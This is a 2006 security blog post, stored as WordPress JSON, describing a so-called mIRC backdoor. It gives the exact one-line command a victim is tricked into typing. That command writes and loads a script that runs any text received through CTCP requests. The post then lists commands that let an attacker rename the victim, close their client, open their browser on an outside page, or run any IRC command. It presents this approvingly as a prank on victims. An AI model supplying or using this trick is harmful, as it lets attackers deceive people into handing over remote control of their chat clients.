{"id":71,"date":"2006-02-24T22:16:46","date_gmt":"2006-02-24T22:16:46","guid":{"rendered":"https:\/\/www.darknet.org.uk\/2006\/02\/mirc-backdoor\/"},"modified":"2010-06-21T17:50:16","modified_gmt":"2010-06-21T16:50:16","slug":"mirc-backdoor","status":"publish","type":"post","link":"https:\/\/www.darknet.org.uk\/2006\/02\/mirc-backdoor\/","title":{"rendered":"mIRC Backdoor"},"content":{"rendered":"
<\/p>\n
Well it’s not really a backdoor… but we can consider it one…<\/p>\n
Some time ago an article about a backdoor in mIRC appeared on many websites (including mine)… all this backdoor stuff was really nothing more than a mIRC script that made the client execute whatever text it received via a CTCP (Client to Client Protocol) request… such as ping, version, time, etc…. so here is the command that the victim has to enter:<\/p>\n
\n\/\/.write -c mirc.dll ctcp 1:*:*:$1- | \/.load -rs mirc.dll<\/p>\n<\/blockquote>\n
The command is split into 2 parts, delimited by | (a vertical bar)… The first part writes a file “mirc.dll” containing a simple mIRC script which listens for any CTCP request… the second part loads that file as a mIRC script….<\/p>\n
After the “victim” executes this command we can control their client by sending one of the following lines:<\/p>\n
\n{ this is a comment }<\/p>\n
\/ctcp victims_nick \/.nick lamer { changes the nickname of the victim to lamer }<\/p>\n
\/ctcp victims_nick \/.exit { closes the victim’s mIRC }<\/p>\n
\/ctcp victims_nick \/.run www.black2white.as.ro
\n{ opens the victim’s default web browser (IE, Firefox, Opera, etc.) on the page www.black2white.as.ro }<\/p>\n<\/p>\n\/ctcp victims_nick \/.any_valid_irc_command<\/p>\n<\/blockquote>\n
So happy “masterminding”….<\/p>\n
<\/p>\n